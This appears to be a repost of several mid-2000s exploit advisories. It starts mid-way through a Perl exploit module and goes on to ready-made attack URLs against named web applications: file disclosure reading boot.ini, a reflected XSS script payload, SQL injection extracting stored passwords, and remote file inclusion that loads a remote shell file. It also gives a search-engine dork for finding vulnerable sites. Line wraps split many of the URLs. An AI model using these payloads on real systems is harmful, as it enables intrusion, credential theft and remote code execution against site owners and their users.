{ $fill_extract_result=0; $end_break=1; } if ($fill_extract_result>0) { push(@extract_result,$results[$i]); } if ($results[$i] =~ /\<body class=\"patternNoViewPage\"\>/) { $fill_extract_result=1; } $i++; } if (@extract_result < 3) { $self->PrintLine("[*] Target may be not vulnerable, or you have used ';' char in CMD"); } else { for ($i=1;$i<@extract_result;$i+=2) { chomp @extract_result; $self->PrintLine("$extract_result[$i]"); } } } $s->Close(); return; } sub VHost { my $self = shift; my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST'); return $name; } 1; # milw0rm.com [2006-08-02] vns3curity(HCE) Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities HTML Code: ****************************************************************** ************* # Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities # Author : ajann # Contact : :( ****************************************************************** ************* Login Before Vulnerabilities.: [[SOURCE]]] http://[target]/[path]//getfile.asp?filename=[SQL] Example: //getfile.asp?filename= /index.asp //getfile.asp?filename= / / /boot.ini [[/SOURCE]]] [[XSS]]] http://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam =&u_input=&u_field=&intpage=2&keyword=[XSS] Example: //index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_fiel d=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3 B%3C%2Fscript%3E Black_hat_cr(HCE) Ultimate PHP Board <= 2.0 Remote file inclusion google: "Powered by UPB" xploit: Code: <server>/<path>/includes/header_simple.php?_CONFIG[skin_dir]=con_shell Black_hat_cr(HCE) Uploader & Downloader 3.0 (id_user) Remote SQL Injection Vulnerability Code: ################################################################## ###### # uploader&downloader v3 Remote SQL Injection Vulnerability # # Download: ftp://ftp1.comscripts.com/PHP/1892_uploader-30.zip # # Found By: the master # ################################################################## ###### # exploit: # # http://[Target]/[Path]/administration/administre2.php?id_user=- 1%20UNION%20SELECT%20null,passe,null,null%20FROM%20connect_upload _fichier%20WHERE%20id_user=1 # # Greetz: str0ke , Dr Max Virus , Kacper ################################################################## ###### black_hat_cr(HCE) Valdersoft Shopping Cart 3.0 Multiple Remote File Include Vulnerabilities Code: *Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[ commonIncludePath ] Remote File Include* ****************************************************************** ************************************ ******************************************* +class : Remote File Include Vulnerability* ******************************************* +Author : mdx * ****************************************************************** *********** +Files : * +/common_include/common.php , /include/common.php, /admin/include/common.php* * * ****************************************************************** *********** +code : * + * + include ( $commonIncludePath."common.php" ); * + * ****************************************************************** *************************** + Exploit : * +***************************************************************** ***************************+ + http://www.site.***/[path]/admin/include/common.php?commonIncludePath=http: //mdxshell.txt?*+ +***************************************************************** ***************************+ + http://www.site.***/[path]/include/common.php?commonIncludePath=http://mdxs hell.txt?*******+ +***************************************************************** ***************************+ + http://www.site.***/[path]/common_include/common.php?commonIncludePath=ht tp://mdxshell.txt?+ +***************************************************************** ***************************+ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++ =========================================================== =================================== ? * ? * ? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord* ? * ?///////////////////////////////////////////////////////////////////////////////////////////// ? specials thanks stroke ,SHiKaA -* ****************************************************************** **************************** ******************* * ******************* KORKULARINIZ SADECE KABUSLARINIZDIR * ******************* * ******************* Turkish Hacker by mdx * ******************* * ******************* Korkmak Kurtulmak Degildir. * ******************* * ****************************************************************** **************************** . ******************* KORKULARINIZ SADECE KABUSLARINIZDIR * ******************* * ******************* Turkish Hacker by mdx * ******************* * ******************* Korkmak Kurtulmak Degildir. * *******************